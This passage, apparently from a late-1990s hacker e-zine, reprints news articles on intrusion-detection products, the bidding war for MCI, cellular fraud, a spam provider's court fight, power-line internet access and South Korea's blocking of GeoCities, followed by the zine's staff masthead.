footprints as they move around the network. Sensors pass off events to the management server, which sends alarms via E-mail, pager, or SNMP traps, alerting security administrators to take action. CyberCop's closest competitor is Internet Security Systems' RealSecure software, which includes an attack recognition engine that ferrets out suspicious behavior. "The trickiest part is understanding attacks," said Patrick Taylor, vice president of marketing at Atlanta-based ISS. RealSecure -- which has received good reviews for the breadth and range of attacks it can discover -- brings a more server-based approach to intrusion detection. "Depending on the network topology, having a box on a network segment doesn't work for everyone. Some users need to monitor the activity of servers," Taylor said. ISS' strategy is to sell its technology to other vendors. During the next six to 12 months, RealSecure will be embedded in many of the leading firewalls, switches, and servers, he said. Not The End-All Intrusion-detection systems hold a great deal of promise for security administrators, but like firewalls, they do not solve all security problems, CSI's Powers cautioned. At this stage, "intrusion-detection systems detect only what they know to look for," he said. In the future, vendors will offer tools with expert systems capabilities that can detect suspicious behavior, he said. Intrusion-detection tools are aimed at vertical markets such as financial, telecommunications, government, and military organizations. To be successful in the mainstream market, the tools will have to be inexpensive, easy to use, and able to support intranet applications and popular workstation platforms such as Windows NT, Gartner's O'Reilley said. Firewall vendors -- which are now offering aggressively priced, plug-and-play systems -- can serve as a good model for aspiring intrusion-detection vendors, O'Reilley said. Intrusion-detection tools can cost anywhere from $40,000 to $50,000, but prices are likely to drop during the next 18 months, he said. ©CMP Media, 1996. _____________________________________________________________ WorldCom Bid Threatens BT-MCI Merger By Douglas Hayward, TechWire LONDON -- MCI's mega merger with British Telecom could be abandoned, following a counterbid for the U.S. long distance carrier by WorldCom. The aggressive and acquisitive WorldCom offered MCI shareholders $41.50 a share Wednesday morning, more than the equivalent of $34 a share BT proposes to pay. The bid values MCI at $30 billion -- 41 percent more than the company's $21 billion price tag at close of markets Tuesday, WorldCom said in a statement Wednesday. The combined group, which would be 25 percent owned by MCI's current shareholders, would have revenues of some $30 billion, WorldCom added. BT shares were up 9 percent at midday Wednesday on news of the bid, which could net BT a healthy profit on its 20 percent stake in MCI. BT had no comment to make on the bid early Wednesday afternoon. WorldCom has acquired 40 companies in the past five years, including Internet carrier MFS. Acquiring MCI will boost the combined group's earnings by up to 22 percent and cut its costs by $2.5 billion in the first year after the deal closes, WorldCom said. WorldCom chief executive Bernard Ebbers attempted to boost his company's chances by saying that joining WorldCom made better business sense for MCI than being snatched up by BT. The deal would result in savings for the combined group of roughly $5 billion in the fifth year of the new group's existence, he added. "While MCI and British Telecom are both great companies, the fit between them just doesn't work without sufficient local network assets in place," said Ebbers in a letter to MCI chairman Bert Roberts. Because WorldCom has those assets in place, far greater synergies than BT can offer are possible, he said. "It is clearly a superior fit and, as a result, a superior offer," Ebbers said. WorldCom is trying to exploit the fact that BT was recently forced to lower its bid for MCI, after the American carrier disclosed it was losing more money than it had previously thought in its attempt to break into the local phone market in North America. Ebbers also appealed to MCI's sense of patriotism. "Our two companies are the paradigm for the American entrepreneurial spirit," he said. "We have both forged significant in roads into industries long dominated by giants, and have been among the first to offer consumers a choice of providers for local, long distance, data, and other services." Although BT shares rose dramatically Wednesday morning, the euphoria in London could be short-lived. If the bid succeeds, it could destroy BT's international strategy, which is heavily dependent on its alliance with MCI, particularly in Latin America. Concert, the international joint venture of BT and MCI, has secured several major customer contracts and alliances with leading telephone operators including Telefonica de Espana and Portugal Telecom. Those contracts are at risk if the WorldCom bid succeeds. Copyright (c) CMP Media, 1996. _____________________________________________________________ U.S. cell phone industry battles service thieves October 1, 1997 By Brad Liston ORLANDO, Fla. (Reuter) - Thousands of cellular telephone users have had the unfortunate experience of opening their monthly bills and finding hundreds of dollars in charges for calls they did not make. The good news for them is that such fraud is way down, according to delegates to a conference of the U.S. wireless telephone industry Wednesday. But the bad news is that wireless thieves are getting more sophisticated. "The criminal customer will never go away," warned Roseanna DeMaria, vice president for business security at AT&T Corp. Wireless Services. "He'll just engage in some very creative R&D." At the Cellular Telecommunications Industry Association's Fraud '97 conference, industry leaders said the theft of wireless services in 1996 had dropped to 3 percent of annual revenues. In the early 1990s, that number was 6 percent. There currently are about 50 million wireless customers in the United States. Before 1995, stealing a cell phone signal was a simple as standing outside a shopping mall in an area with heavy cellular traffic and picking up a signal that could be reprogrammed into another phone to make it look as if its calls were coming from a legitimate account. New technologies are making that more difficult, said Thomas McClure, the association's director of fraud managment. For example, wireless service providers can now match an electronic serial number unique to a digital wireless phone with another identification number unique to each account in a system similar to the military's "friend and foe" technology. If someone uses an account on an unauthorized phone, he trips a computer that alerts the service provider. Thanks to that technology, called radio frequency fingerprinting, cellular thieves who could once promise service for 30 days before phone companies caught on now can promise only about three days. For older analog phones, the industry is becoming more adept at spotting changes in customer patterns. "If your account suddenly shows, say, three calls a day to Bangladesh, then a computer will recognize that, and someone will contact you to confirm the calls," McClure said. Law enforcement sources say the ranks of cellular thieves include the usual suspects -- drug smugglers, organized crime figures and criminal fugitives, among others. "The professional criminal is clearly going after our service," McClure said. "He wants to become the invisible man." So where do criminals, whose expertise may lie more along the line of cutting cocaine or breaking thumbs, find people sharp enough to steal cutting-edge technology? "They recruit it," Jeff Nelson, spokesman for the Cellular Telecommunications Industry Association, said. "We're up against some of the best minds in the nation." (C) Reuters Ltd. All rights reserved. _____________________________________________________________ Junk Mail Giant Cyber Promotions Is Back Online By Bill Pietrucha WASHINGTON, DC, U.S.A., 1997 OCT 3 (NB) -- Cyber Promotions Inc., the online junk mail giant, has been reconnected to Internet service provider Apex Global Internet Services (AGIS). "We just went back up in the past hour," a Cyber Promotions spokesperson told Newsbytes. "We're not fully functional yet, but we are back online." Earlier today, Cyber Promotion still was not reconnected to AGIS, despite a ruling last Tuesday that AGIS must reconnect Cyber Promotions until October 16. Earlier this week, Cyber Promotions also posted a $12,500 bond ordered by Judge Anita Brody of the US District Court in Philadelphia to pay for any possible damage to AGIS' network caused by "anti-spam" spam attacks against both Cyber Promotions and AGIS for providing service to Cyber Promotions. This past Tuesday, Judge Brody granted Dresher, Pennsylvania- based Cyber Promotions a temporary preliminary injunction, forcing AGIS to reconnect the bulk e-mail provider to their service. Brody's ruling said that the contract between AGIS and Cyber Promotions requires AGIS to issue a 30 day notice before terminating service. "We obviously are not pleased with the court's ruling," AGIS CEO Phillip Lawlor said after the ruling. "We are not happy with the court's decision, but we must abide by it." Lawlor, who said he regretted ever taking Cyber Promotions on as a client, said Cyber Promotions told the court it is looking for other Internet Service Providers to handle the junk mail account. Lawlor also left the door open for Cyber Promotions, saying AGIS "is looking at all options" regarding October 17, the date AGIS can again disconnect Cyber Promotions. "We'll decide between now and that time what is the best course of action to take," Lawlor said. AGIS counsel Philip Katauskas, however, said, "our actions to date say we don't want them on our network." In late September, the Dearborn, Michigan-based AGIS, the nation's fourth largest carrier of Internet traffic, disconnected several unsolicited, bulk e-mailers, including Cyber Promotions Inc., "for security reasons." "The attacks were of a nature which not only threatened portions of our global, public network, but other parts of the Internet as well," Lawlor said. "Our engineers simply followed AGIS standard security procedures in shutting their service down." Reacting to the shut-off of service, Cyber Promotions filed suit against AGIS in US District Court in Philadelphia for allegedly breaking its distribution contract. US District Court Judge Brody, citing the breach of contract by AGIS for shutting down Cyber Promotions' connection without warning, said in her ruling that "the fact that Cyber is an unpopular citizen of the Internet does not mean that Cyber is not entitled to have its contracts enforced in a court of law or that Cyber is not entitled to such injunctive relief as any similarly situated business." ©1997 Newsbytes _____________________________________________________________ Electric Outlets Could Be Link To the Internet By Gautam Naik The Wall Street Journal 10/07/97 LONDON -- Engineers claim to have developed a breakthrough technology that would let homeowners make phone calls and access the Internet at high speeds via the electric outlets in their walls. If the technology developed by United Utilities PLC and Northern Telecom Ltd. proves commercially viable, it could transform power lines around the world into major conduits on the information superhighway. Because electricity flows into virtually every home and office the new technology could give power companies easy entree into the phone and Internet access businesses, thus posing a serious threat to current providers of those services. Both United Utilities, a power company, and Northern Telecom, a Canadian maker of telecom gear, confirmed that their system was "ready for the mass market," but declined to reveal details until a news conference scheduled for tomorrow. A Northern Telecom spokesman also declined to elaborate. While the technology must still be proven on a large scale, the two companies have tested telephone service over power lines in about 20 U.K. households over the last 12 months -- with positive results, according to Alistair Henderson, chief of technology at Energis PLC, the telecom unit of National Grid Group PLC, which owns and operates the electricity-transmission system in England and Wales. Energis, one of several power companies that has secretly worked with United Utilities on the "power line telephony" project, hopes to use the system to offer data services to its own business customers. "It's very good news for utilities, indeed," says Mr. Henderson. "Everybody has an electricity line to their homes, and every business has electric supply. "At long last, the local monopoly of the incumbent telecom operators is about to be demolished." But some questions remain. Although United Utilities' initial tests have been successful, technical and safety wrinkles have to be ironed out. There's also likely to be intensifying competition from a host of other wanna-be phone and Internet service providers, including cable companies and outfits that use wireless technology to provide high-speed access. And for the new system to be commercially feasible, a power utility would have to sign up 40% or more of homes and offices in a particular neighborhood, Mr. Henderson says. This could prove a difficult task as existing telecommunications players have proven to be adept at making life hard for new entrants. The Baby Bells in the U.S., for example, have largely thwarted efforts by AT&T Corp. and MCI Communications Corp. to enter the local telephone business. In recent years electric utilities in the U.S. and Europe have been trying to enter the telecom fray by the more conventional method of stringing fiber-optic cables along power lines. But so far they've had limited success. As a result, utilities have waited for exactly this kind of breakthrough to make a big splash in the telecom wars. While electric lines have been used before to zap tiny amounts of data between computers, their capacity has always been limited, making commercial applications unfeasible. Now United Utilities' telecom arm, Norweb Communications, has found a way to transmit data at a speed of more than 384 kilobits per second over regular electricity lines -- more than 10 times the speed of Internet modems used by most households with regular telephone lines. The advantage of the latest system -- which uses cellular phone technology to transmit signals along electric wires -- is that utilities needn't spend vast amounts of to build new telecom infrastructure, since existing power lines can simultaneously transmit both electricity, and a phone call, say. Electricity doesn't interfere with the phone transmission for the same reason that a radio broadcast doesn't interfere with a simultaneous TV broadcast: the frequencies are very different. "Utilities won't have to touch the wires underground," notes Mr. Henderson. Of course, there will be some cost to utilities that want to commercialize the new technology and enter the telecom business. Utilities will have to install a device in each residence or office to separate the electricity and phone transmissions. From the device, one line will deliver the telephone and Internet link, while the other will deliver electricity. In the case of the two companies' test, Northern Telecom is believed to have built the box that separates the power and data transmissions. Jennifer Schenker contributed to this article. _____________________________________________________________ Coming Soon: Net Access Through Power Lines October 8, 1997 By Reuters "Canada's Northern Telecom (Nortel) and Britain's Norweb Communications today unveiled new technology allowing reliable, low-cost, high-speed access to the Internet through the domestic electricity supply. In a move heralding the first competition between electricity companies and telecommunications carriers, the two groups said their patented technology would allow power firms to convert their infrastructures into information access networks. Having reduced electrical interference on power lines, the companies said they could shunt data -- and possibly voice -- over power lines into the home at up to 1MB per second. This is up to ten times faster than ISDN, the fastest currently available speed for domestic computer users. Although it is slower than rival ADSL technology being developed by British Telecommunications, which upgrades copper wires, Norweb and Nortel's technology is much cheaper for operators to install. All consumers need is the equipment developed by Nortel and Norweb -- an extra card for personal computers, some software to handle subscription, security, and authentication services, and a small box that is installed next to the electricity meter. This will send and receive data and is in turn linked to a personal computer through an ordinary coaxial cable. Peter Dudley, vice president of Nortel, said the groups had an "absolutely spectacular" amount of interest from electricity companies in Britain and abroad that are keen to offer the service to consumers. "The race is on to be first," he told Reuters. Prices will be set by electricity companies that offer the service. But consumers currently spend an average of 20 to 30 pounds ($48.60) per month for Internet access -- and the new service offers permanent access without telephone costs. "Assuming they continue to spend at that rate, it is not unreasonable to assume that is the kind of tariffing that may be submitted," Dudley said. The Canadian telecoms equipment maker, and Norweb, part of England's multiutility United Utilities, said their technology was fast enough for most future domestic or small office applications and was cost effective enough to allow operators returns on investments. "As one of the first practical, low cost answers to the problem of high speed access to the Internet, this technology will unleash the next wave of growth," Dudley said. The two companies have developed a "specialized signaling scheme" that allows them to carry data traffic between local power substations and homes, effectively turning the electricity supply into a communications network. Each substation is then linked by fiber-optic circuits to a central switch -- and from there into the worldwide computer network. After 18 months of refining and upgrading a prototype and promising "oodles of bandwidth," the companies said they planned to market the technology in Europe and the Asia Pacific region. "We are ready to ship in volume," said Ian Vance, vice president and chief scientist at Nortel Europe. Banking on high growth and good economic returns, Norweb hopes to attract around 200 customers in a marketing pilot in northwestern England in the second quarter of 1998 before rolling out the service." _____________________________________________________________ GTE Makes $28B Cash Offer For MCI By Kora McNaughton, TechInvestor GTE made a $28 billion, all-cash bid Wednesday to acquire MCI, bringing to three the number of suitors pursuing the long-distance carrier. The latest offer, which values MCI stock at $40 a share, follows WorldCom's $30 billion bid, made two weeks ago. The proposed stock deal from Jackson, Miss.-based WorldCom would give MCI shareholders $41.50 per share. The first suitor, British Telecom, needed only final shareholder approval for its $23 billion marriage to MCI when WorldCom made its higher bid. But now GTE is in the game. CEO Charles Lee offered MCI Chairman Bert Roberts the chairmanship of the merged company, which would be headquartered in Washington, D.C., where MCI is located. Lee said his company would also consider a cash and stock deal rather than an all-cash acquisition. In a letter to Roberts, Lee said a merger would create a company with more than $40 billion in annual revenue, more than 21 million local and 24 million long-distance lines, and 5 million wireless customers. In addition, Lee continued, it would result in more efficient operations and new revenue opportunities. "No two companies in the industry today are more complemenetary or better situated to expand the availability and breadth of bundled service offerings to local, national and international customers," the letter read. GTE also said it is willing to negotiate a continued relationship with British Telecom if its offer is accepted. MCI said its board "will meet shortly to review all issues and options with respect to the GTE proposal and the unsolicited proposal received from WorldCom, in the context of the company's strategic merger agreement with BT." But the BT deal isn't likely to happen, analysts said. "MCI is in play now," said Steve Shook, an analyst with Interstate/Johnson Lane in Charlotte, N.C. "This is just one more nail in the coffin for BT." British Telecom had planned to pay about $23 billion, a price that was reduced after MCI revealed last summer that it would incur hundreds of millions of dollars in losses trying to enter the local phone market this year. The prospect of another uninvited guest at the MCI bidding party sent shares of MCI, British Telecom, WorldCom, and GTE in opposite directions Wednesday. Trading of MCI and GTE shares was suspended around 1:00 p.m., but MCI [MCIC] shares resumed trading an hour later and closed up 1 9/16 to 36 7/8. GTE [GTE] was up 2 3/16 at 48 before the suspension of trading. Shares of British Telecom [BTY], which owns a 20 percent stake in MCI, climbed 2 11/16 to 75, while WorldCom [WCOM] fell 1 5/16 to 35 7/16. MCI's board had been considering WorldCom's offer but had not yet made a decision about whether to abandon the BT deal. Shareholder approval is still needed for any merger, whether it is with BT, WorldCom, or GTE. Shook said the WorldCom offer remains the best of the bunch. Although GTE's offer is all cash, "it's not like you're getting a junky stock with WorldCom," he said. "You're getting really good currency. WorldCom has always delivered on what they said." But if the prospect of a merged WorldCom-MCI was more appetizing to analysts than the BT deal, the advantages over GTE's proposal are not so clear. BT has no presence in the U.S. local phone market, which MCI has been trying, with little success, to penetrate. WorldCom has a limited local business, while GTE already provides local service in 29 states. GTE is also a contender in the race to provide one-stop shopping for communications services, including local and long-distance calling as well as data services such as Internet access. Last May, GTE bought Internet access provider BBN, and it has a strategic alliance with Cisco to develop enhanced data and Internet services. Earlier Wednesday, GTE reported third quarter profits of $756 million, or 79 cents a share, beating Wall Street estimates of 77 cents per share, as reported by First Call. During the quarter, consolidated revenue was up 11 percent to $5.94 billion, compared to $5.34 billion in the third quarter last year. The 11 percent jump includes $127 million from GTE's acquisition of BBN. Excluding the $127 million of new revenue related to BBN, sales grew 8.8 percent. "These results illustrate our success in positioning GTE for the future," said GTE CEO Charles Lee. "The BBN acquisition, completed during the quarter, represents the cornerstone of GTE's strategy to become a dominant player in the data market." ©CMP Media, 1997. _____________________________________________________________ GeoCities Sites Blocked In South Korea 10/22/97 By John Borland, Net Insider In the second such instance of international censorship leveled at the company this year, all sites on the sprawling GeoCites network of Websites have been blocked in South Korea. Company officials confirmed Wednesday that the South Korean government asked the agency that handles network traffic in that country to block access to all GeoCities sites by South Korean citizens. The request came in reaction to a single pro-North Korean site on the GeoCities network. "Unfortunately they are blocking access to over a million sites," said GeoCities spokesman Bennett Kleinberg, of Edelman Public Relations Worldwide. "GeoCities has issued a letter to the Consulate General … asking that they look into the situation." The company first learned of the blockage on Oct. 12, through an E-mail from a user, Kleinberg said. After examining the offending page, the company determined that it did not violate the contract that all GeoCities "homesteaders" must sign, and decided to let it remain online. The page, sponsored by a group calling itself the Australian Association for the Study of the Juche Idea, praises North Korean philosophy and leadership. Juche, it says, is an concept developed by late North Korean President Kim Il Sung focusing on self-reliance and national independence. Korean officials at the country's San Francisco Consulate said they did not have enough knowledge of the situation to comment. The action is the second time this year that GeoCities sites have been unavailable to an entire country of users. In June, the Malaysian government asked the country's single Internet service provider to block access to GeoCities, again because of a single site that was critical of the government. In that case, however, GeoCities determined that the site's calls for "insurrection and revolution" had violated the service's terms of agreement, and quickly took it offline. "We reserve the right to pull any site at any time" that has violated the service's contract, Kleinberg said. "But at this point the determination has been made that [the pro-North Korean site] hasn't done that." The action was not unexpected coming from the current South Korean leadership, said Stanton McCandlish, program director at the Electronic Freedom Foundation. The government has repeatedly shut down South Korean Websites disseminating pro-North Korean information, he said. "They [South Korean Leadership] are used to being able to unilaterally ban things," McCandlish said. "The Internet is not a medium that can be effectively censored. It's a hard lesson for them to learn." As of Wednesday, GeoCities had not heard back from the Korean government, Kleinberg said, but hoped to resolve the situation though normal trade and diplomatic channels. ©CMP Media, 1997. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : thtj communications, inc.³ ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Editor-in Chief: Scud-O, scud@thtj.com Executive Editor: KungFuFox, kungfufox@thtj.com Submissions Editor: Keystroke, submissions@thtj.com Distribution Editor: Malhavoc, malhavoc@thtj.com Site Manager: Scud-O, scud@thtj.com Special Features Editor: Content Editors: FH, fh@thtj.com Phrax, phrax@thtj.com Shok, Staff Writers: memor, memor@thtj.com ArcAngel, arcangel@thtj.com lurk3r, Shok, The Messiah, ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ³ Where It's At ³ On Undernet: #phreak #hackphreak #hackers #carparts On EFNet: #linuxos #phrack #sinnerz ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ A-th-a-th-a-th-a-that's all folks! Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : - End of Communique - ³ ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ